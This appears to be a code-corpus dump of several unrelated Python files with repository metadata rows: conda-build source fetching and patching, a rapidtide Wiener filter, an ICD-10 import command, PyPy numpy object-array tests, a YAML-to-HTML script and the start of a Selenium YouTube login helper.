# as well as `pip install name-version.whl` as install command
unzip(src_path, tmpdir)
copy_into(src_path, tmpdir, timeout, locking=locking)
else:
# In this case, the build script will need to deal with unpacking the source
print("Warning: Unrecognized source format. Source file will be copied to the SRC_DIR")
copy_into(src_path, tmpdir, timeout, locking=locking)
flist = os.listdir(tmpdir)
folder = os.path.join(tmpdir, flist[0])
if len(flist) == 1 and os.path.isdir(folder):
hoist_single_extracted_folder(folder)
flist = os.listdir(tmpdir)
for f in flist:
shutil.move(os.path.join(tmpdir, f), os.path.join(src_dir, f))
def git_mirror_checkout_recursive(git, mirror_dir, checkout_dir, git_url, git_cache, git_ref=None,
git_depth=-1, is_top_level=True, verbose=True):
""" Mirror (and checkout) a Git repository recursively.
It's not possible to use `git submodule` on a bare
repository, so the checkout must be done before we
know which submodules there are.
Worse, submodules can be identified by using either
absolute URLs or relative paths. If relative paths
are used those need to be relocated upon mirroring,
but you could end up with `../../../../blah` and in
that case conda-build could be tricked into writing
to the root of the drive and overwriting the system
folders unless steps are taken to prevent that.
"""
if verbose:
stdout = None
stderr = None
else:
FNULL = open(os.devnull, 'w')
stdout = FNULL
stderr = FNULL
if not mirror_dir.startswith(git_cache + os.sep):
sys.exit("Error: Attempting to mirror to %s which is outside of GIT_CACHE %s"
% (mirror_dir, git_cache))
# This is necessary for Cygwin git and m2-git, although it is fixed in newer MSYS2.
git_mirror_dir = convert_path_for_cygwin_or_msys2(git, mirror_dir)
git_checkout_dir = convert_path_for_cygwin_or_msys2(git, checkout_dir)
if not isdir(os.path.dirname(mirror_dir)):
os.makedirs(os.path.dirname(mirror_dir))
if isdir(mirror_dir):
if git_ref != 'HEAD':
check_call_env([git, 'fetch'], cwd=mirror_dir, stdout=stdout, stderr=stderr)
else:
# Unlike 'git clone', fetch doesn't automatically update the cache's HEAD,
# So here we explicitly store the remote HEAD in the cache's local refs/heads,
# and then explicitly set the cache's HEAD.
# This is important when the git repo is a local path like "git_url: ../",
# but the user is working with a branch other than 'master' without
# explicitly providing git_rev.
check_call_env([git, 'fetch', 'origin', '+HEAD:_conda_cache_origin_head'],
cwd=mirror_dir, stdout=stdout, stderr=stderr)
check_call_env([git, 'symbolic-ref', 'HEAD', 'refs/heads/_conda_cache_origin_head'],
cwd=mirror_dir, stdout=stdout, stderr=stderr)
else:
args = [git, 'clone', '--mirror']
if git_depth > 0:
args += ['--depth', str(git_depth)]
try:
check_call_env(args + [git_url, git_mirror_dir], stdout=stdout, stderr=stderr)
except CalledProcessError:
# on windows, remote URL comes back to us as cygwin or msys format. Python doesn't
# know how to normalize it. Need to convert it to a windows path.
if sys.platform == 'win32' and git_url.startswith('/'):
git_url = convert_unix_path_to_win(git_url)
if os.path.exists(git_url):
# Local filepaths are allowed, but make sure we normalize them
git_url = normpath(git_url)
check_call_env(args + [git_url, git_mirror_dir], stdout=stdout, stderr=stderr)
assert isdir(mirror_dir)
# Now clone from mirror_dir into checkout_dir.
check_call_env([git, 'clone', git_mirror_dir, git_checkout_dir], stdout=stdout, stderr=stderr)
if is_top_level:
checkout = git_ref
if git_url.startswith('.'):
output = check_output_env([git, "rev-parse", checkout], stdout=stdout, stderr=stderr)
checkout = output.decode('utf-8')
if verbose:
print('checkout: %r' % checkout)
if checkout:
check_call_env([git, 'checkout', checkout],
cwd=checkout_dir, stdout=stdout, stderr=stderr)
# submodules may have been specified using relative paths.
# Those paths are relative to git_url, and will not exist
# relative to mirror_dir, unless we do some work to make
# it so.
try:
submodules = check_output_env([git, 'config', '--file', '.gitmodules', '--get-regexp',
'url'], stderr=stdout, cwd=checkout_dir)
submodules = submodules.decode('utf-8').splitlines()
except CalledProcessError:
submodules = []
for submodule in submodules:
matches = git_submod_re.match(submodule)
if matches and matches.group(2)[0] == '.':
submod_name = matches.group(1)
submod_rel_path = matches.group(2)
submod_url = urljoin(git_url + '/', submod_rel_path)
submod_mirror_dir = os.path.normpath(
os.path.join(mirror_dir, submod_rel_path))
if verbose:
print('Relative submodule %s found: url is %s, submod_mirror_dir is %s' % (
submod_name, submod_url, submod_mirror_dir))
with TemporaryDirectory() as temp_checkout_dir:
git_mirror_checkout_recursive(git, submod_mirror_dir, temp_checkout_dir, submod_url,
git_cache=git_cache, git_ref=git_ref,
git_depth=git_depth, is_top_level=False,
verbose=verbose)
if is_top_level:
# Now that all relative-URL-specified submodules are locally mirrored to
# relatively the same place we can go ahead and checkout the submodules.
check_call_env([git, 'submodule', 'update', '--init',
'--recursive'], cwd=checkout_dir, stdout=stdout, stderr=stderr)
git_info(checkout_dir, verbose=verbose)
if not verbose:
FNULL.close()
def git_source(source_dict, git_cache, src_dir, recipe_path=None, verbose=True):
''' Download a source from a Git repo (or submodule, recursively) '''
if not isdir(git_cache):
os.makedirs(git_cache)
git = external.find_executable('git')
if not git:
sys.exit("Error: git is not installed in your root environment.")
git_url = source_dict['git_url']
git_depth = int(source_dict.get('git_depth', -1))
git_ref = source_dict.get('git_rev', 'HEAD')
if git_url.startswith('.'):
# It's a relative path from the conda recipe
git_url = abspath(normpath(os.path.join(recipe_path, git_url)))
if sys.platform == 'win32':
git_dn = git_url.replace(':', '_')
else:
git_dn = git_url[1:]
else:
git_dn = git_url.split('://')[-1].replace('/', os.sep)
if git_dn.startswith(os.sep):
git_dn = git_dn[1:]
git_dn = git_dn.replace(':', '_')
mirror_dir = join(git_cache, git_dn)
git_mirror_checkout_recursive(
git, mirror_dir, src_dir, git_url, git_cache=git_cache, git_ref=git_ref,
git_depth=git_depth, is_top_level=True, verbose=verbose)
return git
def git_info(src_dir, verbose=True, fo=None):
''' Print info about a Git repo. '''
assert isdir(src_dir)
git = external.find_executable('git')
if not git:
log = get_logger(__name__)
log.warn("git not installed in root environment. Skipping recording of git info.")
return
if verbose:
stderr = None
else:
FNULL = open(os.devnull, 'w')
stderr = FNULL
# Ensure to explicitly set GIT_DIR as some Linux machines will not
# properly execute without it.
env = os.environ.copy()
env['GIT_DIR'] = join(src_dir, '.git')
env = {str(key): str(value) for key, value in env.items()}
for cmd, check_error in [
('git log -n1', True),
('git describe --tags --dirty', False),
('git status', True)]:
try:
stdout = check_output_env(cmd.split(), stderr=stderr, cwd=src_dir, env=env)
except CalledProcessError as e:
if check_error:
raise Exception("git error: %s" % str(e))
encoding = locale.getpreferredencoding()
if not fo:
encoding = sys.stdout.encoding
encoding = encoding or 'utf-8'
if hasattr(stdout, 'decode'):
stdout = stdout.decode(encoding, 'ignore')
if fo:
fo.write(u'==> %s <==\n' % cmd)
if verbose:
fo.write(stdout + u'\n')
else:
if verbose:
print(u'==> %s <==\n' % cmd)
safe_print_unicode(stdout + u'\n')
def hg_source(source_dict, src_dir, hg_cache, verbose):
''' Download a source from Mercurial repo. '''
if verbose:
stdout = None
stderr = None
else:
FNULL = open(os.devnull, 'w')
stdout = FNULL
stderr = FNULL
hg_url = source_dict['hg_url']
if not isdir(hg_cache):
os.makedirs(hg_cache)
hg_dn = hg_url.split(':')[-1].replace('/', '_')
cache_repo = join(hg_cache, hg_dn)
if isdir(cache_repo):
check_call_env(['hg', 'pull'], cwd=cache_repo, stdout=stdout, stderr=stderr)
else:
check_call_env(['hg', 'clone', hg_url, cache_repo], stdout=stdout, stderr=stderr)
assert isdir(cache_repo)
# now clone in to work directory
update = source_dict.get('hg_tag') or 'tip'
if verbose:
print('checkout: %r' % update)
check_call_env(['hg', 'clone', cache_repo, src_dir], stdout=stdout,
stderr=stderr)
check_call_env(['hg', 'update', '-C', update], cwd=src_dir, stdout=stdout,
stderr=stderr)
if not verbose:
FNULL.close()
return src_dir
def svn_source(source_dict, src_dir, svn_cache, verbose=True, timeout=90, locking=True):
''' Download a source from SVN repo. '''
if verbose:
stdout = None
stderr = None
else:
FNULL = open(os.devnull, 'w')
stdout = FNULL
stderr = FNULL
def parse_bool(s):
return str(s).lower().strip() in ('yes', 'true', '1', 'on')
svn_url = source_dict['svn_url']
svn_revision = source_dict.get('svn_rev') or 'head'
svn_ignore_externals = parse_bool(source_dict.get('svn_ignore_externals') or 'no')
if not isdir(svn_cache):
os.makedirs(svn_cache)
svn_dn = svn_url.split(':', 1)[-1].replace('/', '_').replace(':', '_')
cache_repo = join(svn_cache, svn_dn)
if svn_ignore_externals:
extra_args = ['--ignore-externals']
else:
extra_args = []
if isdir(cache_repo):
check_call_env(['svn', 'up', '-r', svn_revision] + extra_args, cwd=cache_repo,
stdout=stdout, stderr=stderr)
else:
check_call_env(['svn', 'co', '-r', svn_revision] + extra_args + [svn_url, cache_repo],
stdout=stdout, stderr=stderr)
assert isdir(cache_repo)
# now copy into work directory
copy_into(cache_repo, src_dir, timeout, symlinks=True, locking=locking)
if not verbose:
FNULL.close()
return src_dir
def get_repository_info(recipe_path):
"""This tries to get information about where a recipe came from. This is different
from the source - you can have a recipe in svn that gets source via git."""
try:
if exists(join(recipe_path, ".git")):
origin = check_output_env(["git", "config", "--get", "remote.origin.url"],
cwd=recipe_path)
rev = check_output_env(["git", "rev-parse", "HEAD"], cwd=recipe_path)
return "Origin {}, commit {}".format(origin, rev)
elif isdir(join(recipe_path, ".hg")):
origin = check_output_env(["hg", "paths", "default"], cwd=recipe_path)
rev = check_output_env(["hg", "id"], cwd=recipe_path).split()[0]
return "Origin {}, commit {}".format(origin, rev)
elif isdir(join(recipe_path, ".svn")):
info = check_output_env(["svn", "info"], cwd=recipe_path)
server = re.search("Repository Root: (.*)$", info, flags=re.M).group(1)
revision = re.search("Revision: (.*)$", info, flags=re.M).group(1)
return "{}, Revision {}".format(server, revision)
else:
return "{}, last modified {}".format(recipe_path,
time.ctime(os.path.getmtime(
join(recipe_path, "meta.yaml"))))
except CalledProcessError:
get_logger(__name__).debug("Failed to checkout source in " + recipe_path)
return "{}, last modified {}".format(recipe_path,
time.ctime(os.path.getmtime(
join(recipe_path, "meta.yaml"))))
def _ensure_unix_line_endings(path):
"""Replace windows line endings with Unix. Return path to modified file."""
out_path = path + "_unix"
with open(path, "rb") as inputfile:
with open(out_path, "wb") as outputfile:
for line in inputfile:
outputfile.write(line.replace(b"\r\n", b"\n"))
return out_path
def _ensure_win_line_endings(path):
"""Replace unix line endings with win. Return path to modified file."""
out_path = path + "_win"
with open(path, "rb") as inputfile:
with open(out_path, "wb") as outputfile:
for line in inputfile:
outputfile.write(line.replace(b"\n", b"\r\n"))
return out_path
def _guess_patch_strip_level(filesstr, src_dir):
""" Determine the patch strip level automatically. """
maxlevel = None
files = {filestr.encode(errors='ignore') for filestr in filesstr}
src_dir = src_dir.encode(errors='ignore')
for file in files:
numslash = file.count(b'/')
maxlevel = numslash if maxlevel is None else min(maxlevel, numslash)
if maxlevel == 0:
patchlevel = 0
else:
histo = dict()
histo = {i: 0 for i in range(maxlevel + 1)}
for file in files:
parts = file.split(b'/')
for level in range(maxlevel + 1):
if os.path.exists(join(src_dir, *parts[-len(parts) + level:])):
histo[level] += 1
order = sorted(histo, key=histo.get, reverse=True)
if histo[order[0]] == histo[order[1]]:
print("Patch level ambiguous, selecting least deep")
patchlevel = min([key for key, value
in histo.items() if value == histo[order[0]]])
return patchlevel
def _get_patch_file_details(path):
re_files = re.compile('^(?:---|\+\+\+) ([^\n\t]+)')
files = set()
with io.open(path, errors='ignore') as f:
files = []
first_line = True
is_git_format = True
for l in f.readlines():
if first_line and not re.match('From [0-9a-f]{40}', l):
is_git_format = False
first_line = False
m = re_files.search(l)
if m and m.group(1) != '/dev/null':
files.append(m.group(1))
elif is_git_format and l.startswith('git') and not l.startswith('git --diff'):
is_git_format = False
return (files, is_git_format)
def apply_patch(src_dir, path, config, git=None):
if not isfile(path):
sys.exit('Error: no such patch: %s' % path)
files, is_git_format = _get_patch_file_details(path)
if git and is_git_format:
# Prevents git from asking interactive questions,
# also necessary to achieve sha1 reproducibility;
# as is --committer-date-is-author-date. By this,
# we mean a round-trip of git am/git format-patch
# gives the same file.
git_env = os.environ
git_env['GIT_COMMITTER_NAME'] = 'conda-build'
git_env['GIT_COMMITTER_EMAIL'] = 'conda@conda-build.org'
check_call_env([git, 'am', '--committer-date-is-author-date', path],
cwd=src_dir, stdout=None, env=git_env)
config.git_commits_since_tag += 1
else:
print('Applying patch: %r' % path)
patch = external.find_executable('patch', config.build_prefix)
if patch is None:
sys.exit("""\
Error:
Cannot use 'git' (not a git repo and/or patch) and did not find 'patch' in: %s
You can install 'patch' using apt-get, yum (Linux), Xcode (MacOSX),
or conda, m2-patch (Windows),
""" % (os.pathsep.join(external.dir_paths)))
patch_strip_level = _guess_patch_strip_level(files, src_dir)
patch_args = ['-p%d' % patch_strip_level, '-i', path]
# line endings are a pain.
# https://unix.stackexchange.com/a/243748/34459
try:
log = get_logger(__name__)
log.info("Trying to apply patch as-is")
check_call_env([patch] + patch_args, cwd=src_dir)
except CalledProcessError:
if sys.platform == 'win32':
unix_ending_file = _ensure_unix_line_endings(path)
patch_args[-1] = unix_ending_file
try:
log.info("Applying unmodified patch failed. "
"Convert to unix line endings and trying again.")
check_call_env([patch] + patch_args, cwd=src_dir)
except:
log.info("Applying unix patch failed. "
"Convert to CRLF line endings and trying again with --binary.")
patch_args.insert(0, '--binary')
win_ending_file = _ensure_win_line_endings(path)
patch_args[-1] = win_ending_file
try:
check_call_env([patch] + patch_args, cwd=src_dir)
finally:
if os.path.exists(win_ending_file):
os.remove(win_ending_file) # clean up .patch_win file
finally:
if os.path.exists(unix_ending_file):
os.remove(unix_ending_file) # clean up .patch_unix file
else:
raise
def provide(metadata, patch=True):
"""
given a recipe_dir:
- download (if necessary)
- unpack
- apply patches (if any)
"""
meta = metadata.get_section('source')
if not os.path.isdir(metadata.config.build_folder):
os.makedirs(metadata.config.build_folder)
git = None
if hasattr(meta, 'keys'):
dicts = [meta]
else:
dicts = meta
for source_dict in dicts:
folder = source_dict.get('folder')
src_dir = (os.path.join(metadata.config.work_dir, folder) if folder else
metadata.config.work_dir)
if any(k in source_dict for k in ('fn', 'url')):
unpack(source_dict, src_dir, metadata.config.src_cache, recipe_path=metadata.path,
croot=metadata.config.croot, verbose=metadata.config.verbose,
timeout=metadata.config.timeout, locking=metadata.config.locking)
elif 'git_url' in source_dict:
git = git_source(source_dict, metadata.config.git_cache, src_dir, metadata.path,
verbose=metadata.config.verbose)
# build to make sure we have a work directory with source in it. We want to make sure that
# whatever version that is does not interfere with the test we run next.
elif 'hg_url' in source_dict:
hg_source(source_dict, src_dir, metadata.config.hg_cache,
verbose=metadata.config.verbose)
elif 'svn_url' in source_dict:
svn_source(source_dict, src_dir, metadata.config.svn_cache,
verbose=metadata.config.verbose, timeout=metadata.config.timeout,
locking=metadata.config.locking)
elif 'path' in source_dict:
path = normpath(abspath(join(metadata.path, source_dict['path'])))
if metadata.config.verbose:
print("Copying %s to %s" % (path, src_dir))
# careful here: we set test path to be outside of conda-build root in setup.cfg.
# If you don't do that, this is a recursive function
copy_into(path, src_dir, metadata.config.timeout, symlinks=True,
locking=metadata.config.locking, clobber=True)
else: # no source
if not isdir(src_dir):
os.makedirs(src_dir)
if patch:
patches = ensure_list(source_dict.get('patches', []))
for patch in patches:
apply_patch(src_dir, join(metadata.path, patch), metadata.config, git)
return metadata.config.work_dir
| 41.60155
| 100
| 0.595051
|
4a18f78736b84b0454cdb59a1321f03b0af27ae4
| 633
|
py
|
Python
|
scripts/make_html.py
|
dannguyen/smalldata
|
73db5892e0cf6ae1e338c343b2f1b0c3d1c131b3
|
[
"MIT"
] | 4
|
2016-10-23T00:37:02.000Z
|
2021-02-28T03:59:16.000Z
|
scripts/make_html.py
|
dannguyen/smalldata
|
73db5892e0cf6ae1e338c343b2f1b0c3d1c131b3
|
[
"MIT"
] | null | null | null |
scripts/make_html.py
|
dannguyen/smalldata
|
73db5892e0cf6ae1e338c343b2f1b0c3d1c131b3
|
[
"MIT"
] | 1
|
2020-04-28T06:31:58.000Z
|
2020-04-28T06:31:58.000Z
|
import argparse
from csv import DictReader
from pathlib import Path
from sys import stdout, stderr
from settings import create_dataset_object,\
dataset_template
import yaml
if __name__ == '__main__':
parser = argparse.ArgumentParser("Print out a HTML version of dataset YAML file")
parser.add_argument('infile', type=argparse.FileType('r'),
help="The name of a dataset YAML file")
args = parser.parse_args()
metaname = args.infile
stderr.write("Reading meta from %s\n" % metaname.name)
d = create_dataset_object(yaml.load(metaname.read()))
stdout.write(dataset_template(d))
| 33.315789
| 85
| 0.71564
|
4a18f859f60cd8803a596c795d038c3335799e66
| 4,353
|
py
|
Python
|
rapidtide/wiener.py
|
bbfrederick/rapidtide
|
ddd1899a93fafd550feb134debdd028bbba8c853
|
[
"Apache-2.0"
] | 44
|
2017-01-19T10:12:39.000Z
|
2022-02-08T05:43:58.000Z
|
rapidtide/wiener.py
|
bbfrederick/delaytools
|
190d79ae4c19317dfce38a528e43fd05459f29a5
|
[
"Apache-2.0"
] | 70
|
2018-05-02T14:35:45.000Z
|
2022-03-18T17:43:33.000Z
|
rapidtide/wiener.py
|
bbfrederick/delaytools
|
190d79ae4c19317dfce38a528e43fd05459f29a5
|
[
"Apache-2.0"
] | 12
|
2019-02-12T20:40:27.000Z
|
2021-06-16T13:28:21.000Z
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
#
# Copyright 2016-2021 Blaise Frederick
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# $Author: frederic $
# $Date: 2016/07/11 14:50:43 $
# $Id: rapidtide,v 1.161 2016/07/11 14:50:43 frederic Exp $
#
#
#
import numpy as np
import rapidtide.fit as tide_fit
import rapidtide.multiproc as tide_multiproc
import rapidtide.util as tide_util
def _procOneVoxelWiener(vox, lagtc, inittc, rt_floatset=np.float64, rt_floattype="float64"):
thefit, R = tide_fit.mlregress(lagtc, inittc)
fitcoff = rt_floatset(thefit[0, 1])
datatoremove = rt_floatset(fitcoff * lagtc)
return (
vox,
rt_floatset(thefit[0, 0]),
rt_floatset(R),
rt_floatset(R * R),
fitcoff,
rt_floatset(thefit[0, 1] / thefit[0, 0]),
datatoremove,
rt_floatset(inittc - datatoremove),
)
def wienerpass(
numspatiallocs,
reportstep,
fmri_data,
threshval,
lagtc,
optiondict,
wienerdeconv,
wpeak,
resampref_y,
rt_floatset=np.float64,
rt_floattype="float64",
):
rt_floatset = (rt_floatset,)
rt_floattype = rt_floattype
inputshape = np.shape(fmri_data)
themask = np.where(np.mean(fmri_data, axis=1) > threshval, 1, 0)
if optiondict["nprocs"] > 1:
# define the consumer function here so it inherits most of the arguments
def Wiener_consumer(inQ, outQ):
while True:
try:
# get a new message
val = inQ.get()
# this is the 'TERM' signal
if val is None:
break
# process and send the data
outQ.put(
_procOneVoxelWiener(
val,
lagtc[val, :],
fmri_data[val, :],
rt_floatset=rt_floatset,
rt_floattype=rt_floattype,
)
)
except Exception as e:
print("error!", e)
break
data_out = tide_multiproc.run_multiproc(
Wiener_consumer,
inputshape,
themask,
nprocs=optiondict["nprocs"],
showprogressbar=True,
chunksize=optiondict["mp_chunksize"],
)
# unpack the data
volumetotal = 0
for voxel in data_out:
meanvalue[voxel[0]] = voxel[1]
rvalue[voxel[0]] = voxel[2]
r2value[voxel[0]] = voxel[3]
fitcoff[voxel[0]] = voxel[4]
fitNorm[voxel[0]] = voxel[5]
datatoremove[voxel[0], :] = voxel[6]
filtereddata[voxel[0], :] = voxel[7]
volumetotal += 1
data_out = []
else:
volumetotal = 0
for vox in range(0, numspatiallocs):
if (vox % reportstep == 0 or vox == numspatiallocs - 1) and optiondict[
"showprogressbar"
]:
tide_util.progressbar(vox + 1, numspatiallocs, label="Percent complete")
inittc = fmri_data[vox, :].copy()
if np.mean(inittc) >= threshval:
(
dummy,
meanvalue[vox],
rvalue[vox],
r2value[vox],
fitcoff[vox],
fitNorm[vox],
datatoremove[vox],
filtereddata[vox],
) = _procOneVoxelWiener(
vox,
lagtc[vox, :],
inittc,
rt_floatset=rt_floatset,
t_floattype=rt_floattype,
)
volumetotal += 1
return volumetotal
| 31.092857
| 92
| 0.526074
|
4a18f8f40f820f78081d0a7c9d8d5715d3343689
| 2,023
|
py
|
Python
|
rmis_integration/management/commands/rmis_get_mkb.py
|
Wellheor1/l2
|
d980210921c545c68fe9d5522bb693d567995024
|
[
"MIT"
] | 10
|
2018-03-14T06:17:06.000Z
|
2022-03-10T05:33:34.000Z
|
rmis_integration/management/commands/rmis_get_mkb.py
|
Wellheor1/l2
|
d980210921c545c68fe9d5522bb693d567995024
|
[
"MIT"
] | 512
|
2018-09-10T07:37:34.000Z
|
2022-03-30T02:23:43.000Z
|
rmis_integration/management/commands/rmis_get_mkb.py
|
D00dleman/l2
|
0870144537ee340cd8db053a608d731e186f02fb
|
[
"MIT"
] | 24
|
2018-07-31T05:52:12.000Z
|
2022-02-08T00:39:41.000Z
|
from django.core.management import BaseCommand
from rmis_integration.client import Client as RC
from directions.models import Diagnoses
class Command(BaseCommand):
help = "Получение справочника МКБ"
def handle(self, *args, **options):
c = RC()
request_data = {
"refbookCode": "1.2.643.5.1.13.3.1058506043530.1.1.5",
"version": "CURRENT",
}
count_parts = c.get_client("path_directory").service.getRefbookParts(**request_data)
for i in range(count_parts):
request_data['partNumber'] = i + 1
mkb_part = c.get_client("path_directory").service.getRefbookPartial(**request_data)
for m in mkb_part:
data = m['column']
code, name, rmis_id = '', '', ''
m_type = 1
for j in data:
if j['name'] == 'CODE':
code = j['data']
if j['name'] == 'NAME':
name = j['data']
if j['name'] == 'ID':
rmis_id = j['data']
if j['name'] == 'HAS_CHILD':
if j['data'] == 'true':
m_type = 1
else:
m_type = 2
if "-" in code:
continue
diag = Diagnoses.objects.filter(code=code).first()
if diag:
if diag.title != name:
diag.title = name
if rmis_id and diag.rmis_id != rmis_id:
diag.rmis_id = rmis_id
diag.m_type = m_type
diag.save()
print(f"обновлено: {code}-{name}-{m_type}") # noqa: T001
if diag is None:
Diagnoses(code=code, title=name, m_type=m_type, d_type='mkb10.4', rmis_id=rmis_id).save()
print(f"создано: {code}-{name}-{m_type}") # noqa: T001
| 39.666667
| 109
| 0.454276
|
4a18f9fa4aef8e90594cb8be86006b39b98d6633
| 6,902
|
py
|
Python
|
pypy/module/micronumpy/test/test_object_arrays.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 381
|
2018-08-18T03:37:22.000Z
|
2022-02-06T23:57:36.000Z
|
pypy/module/micronumpy/test/test_object_arrays.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 16
|
2018-09-22T18:12:47.000Z
|
2022-02-22T20:03:59.000Z
|
pypy/module/micronumpy/test/test_object_arrays.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 55
|
2015-08-16T02:41:30.000Z
|
2022-03-20T20:33:35.000Z
|
from pypy.module.micronumpy.test.test_base import BaseNumpyAppTest
from pypy.conftest import option
class AppTestObjectDtypes(BaseNumpyAppTest):
spaceconfig = dict(usemodules=["micronumpy", "struct", "binascii"])
def setup_class(cls):
BaseNumpyAppTest.setup_class.im_func(cls)
cls.w_runappdirect = cls.space.wrap(option.runappdirect)
def test_scalar_from_object(self):
from numpy import array
import sys
class Polynomial(object):
def whatami(self):
return 'an object'
a = array(Polynomial())
assert a.shape == ()
assert a.sum().whatami() == 'an object'
def test_uninitialized_object_array_is_filled_by_None(self):
import numpy as np
a = np.ndarray([5], dtype="O")
assert a[0] == None
def test_object_arrays_add(self):
import numpy as np
a = np.array(["foo"], dtype=object)
b = np.array(["bar"], dtype=object)
raises(TypeError, np.add, a, 1)
res = a + b
assert res[0] == "foobar"
def test_bool_func(self):
import numpy as np
a = np.array(["foo"], dtype=object)
b = a and complex(1, -1)
assert b == complex(1, -1)
b = np.array(complex(1, -1)) and a
assert (b == a).all()
c = np.array([1, 2, 3])
assert (a[0] != c[0])
assert (c[0] != a[0])
assert (a[0] > c[0])
assert (not a[0] < c[0])
assert (c[0] < a[0])
assert (not c[0] > a[0])
def test_logical_ufunc(self):
import numpy as np
import sys
a = np.array(["foo"], dtype=object)
b = np.array([1], dtype=object)
d = np.array([complex(1, 10)], dtype=object)
c = np.logical_and(a, 1)
assert c.dtype == np.dtype('object')
assert c == 1
c = np.logical_and(b, complex(1, -1))
assert c.dtype == np.dtype('object')
assert c == complex(1, -1)
c = np.logical_and(d, b)
assert c == 1
c = b & 1
assert c.dtype == np.dtype('object')
assert (c == 1).all()
c = np.array(1) & b
assert (c == b).all()
def test_reduce(self):
import numpy as np
class O(object):
def whatami(self):
return 'an object'
fiveOs = [O()] * 5
a = np.array(fiveOs, dtype=object)
print np.maximum
b = np.maximum.reduce(a)
assert b is not None
def test_complex_op(self):
import numpy as np
import sys
a = np.array(['abc', 'def'], dtype=object)
b = np.array([1, 2, 3], dtype=object)
c = np.array([complex(1, 1), complex(1, -1)], dtype=object)
for arg in (a,b,c):
assert (arg == np.real(arg)).all()
assert (0 == np.imag(arg)).all()
if '__pypy__' in sys.builtin_module_names:
skip('not implemented yet')
raises(AttributeError, np.conj, a)
res = np.conj(b)
assert (res == b).all()
res = np.conj(c)
assert res[0] == c[1] and res[1] == c[0]
def test_keep_object_alive(self):
# only translated does it really test the gc
import numpy as np
import gc
class O(object):
def whatami(self):
return 'an object'
fiveOs = [O()] * 5
a = np.array(fiveOs, dtype=object)
del fiveOs
gc.collect()
assert a[2].whatami() == 'an object'
def test_array_interface(self):
import numpy as np
class DummyArray(object):
def __init__(self, interface, base=None):
self.__array_interface__ = interface
self.base = base
a = np.array([(1, 2, 3)], dtype='u4,u4,u4')
b = np.array([(1, 2, 3), (4, 5, 6), (7, 8, 9)], dtype='u4,u4,u4')
interface = dict(a.__array_interface__)
interface['shape'] = tuple([3])
interface['strides'] = tuple([0])
c = np.array(DummyArray(interface, base=a))
c.dtype = a.dtype
#print c
assert (c == np.array([(1, 2, 3), (1, 2, 3), (1, 2, 3)], dtype='u4,u4,u4') ).all()
def test_for_object_scalar_creation(self):
import numpy as np
import sys
a = np.object_()
b = np.object_(3)
b2 = np.object_(3.0)
c = np.object_([4, 5])
d = np.array([None])[0]
assert a is None
assert type(b) is int
assert type(b2) is float
assert type(c) is np.ndarray
assert c.dtype == object
assert type(d) is type(None)
if '__pypy__' in sys.builtin_module_names:
skip('not implemented yet')
e = np.object_([None, {}, []])
assert e.dtype == object
def test_mem_array_creation_invalid_specification(self):
# while not specifically testing object dtype, this
# test segfaulted during ObjectType.store due to
# missing gc hooks
import numpy as np
import sys
ytype = np.object_
if '__pypy__' in sys.builtin_module_names:
dt = np.dtype([('x', int), ('y', ytype)])
x = np.empty((4, 0), dtype = dt)
raises(NotImplementedError, x.__getitem__, 'y')
ytype = str
dt = np.dtype([('x', int), ('y', ytype)])
# Correct way
a = np.array([(1, 'object')], dt)
# Wrong way - should complain about writing buffer to object dtype
raises(ValueError, np.array, [1, 'object'], dt)
def test_astype(self):
import numpy as np
a = np.array([b'a' * 100], dtype='O')
assert 'a' * 100 in str(a)
b = a.astype('S')
assert b.dtype == 'S100'
assert 'a' * 100 in str(b)
a = np.array([u'a' * 100], dtype='O')
assert 'a' * 100 in str(a)
b = a.astype('U')
assert b.dtype == 'U100'
assert 'a' * 100 in str(b)
a = np.array([123], dtype='U')
assert a[0] == u'123'
b = a.astype('O')
assert b[0] == u'123'
assert type(b[0]) is unicode
class MyFloat(object):
def __float__(self):
return 1.0
a = np.array([MyFloat()])
assert a.shape == (1,)
assert a.dtype == np.object_
b = a.astype(float)
assert b.shape == (1,)
assert b.dtype == np.float_
assert (b == 1.0).all()
def test__reduce__(self):
from numpy import arange, dtype
from cPickle import loads, dumps
import sys
a = arange(15).astype(object)
if '__pypy__' in sys.builtin_module_names:
raises(NotImplementedError, dumps, a)
skip('not implemented yet')
b = loads(dumps(a))
assert (a == b).all()
a = arange(15).astype(object).reshape((3, 5))
b = loads(dumps(a))
assert (a == b).all()
| 32.102326
| 90
| 0.526079
|
4a18f9fdd13e11f7657149b004abedeff2767615
| 7,991
|
py
|
Python
|
Youtube/youtube.py
|
rishabhjainfinal/selenium-automations
|
3928e8d1722eb7e8339e782b95c160604d181117
|
[
"MIT"
] | null | null | null |
Youtube/youtube.py
|
rishabhjainfinal/selenium-automations
|
3928e8d1722eb7e8339e782b95c160604d181117
|
[
"MIT"
] | 1
|
2021-03-21T21:04:07.000Z
|
2021-03-21T21:04:07.000Z
|
Youtube/youtube.py
|
rishabhjainfinal/selenium-automations
|
3928e8d1722eb7e8339e782b95c160604d181117
|
[
"MIT"
] | 2
|
2021-03-21T20:54:04.000Z
|
2021-03-21T22:52:15.000Z
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import os
class youtube:
"""This module is use for automation of youtube threw sekenium webdriver
this module is only for youtube
for this module you need latest webdriver in same directory as progarm
just check you browser version
if you don't get the driver then link are;'
[crome = https://chromedriver.chromium.org/downloads]
[Edge = https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/ ] """
def __init__(self,email,password,browser = 'Edge' ):
'''take userid, password,browser(Crome or Edge) and url of youtube although this is strictly for only youtube '''
print("running ")
self.user = email
self.password = password
if browser == 'Chrome' :
self.driver = webdriver.Chrome('D:\selenium automation\youtube automation\chromedriver.exe')
print("using [ crome ] browser")
else :
try:
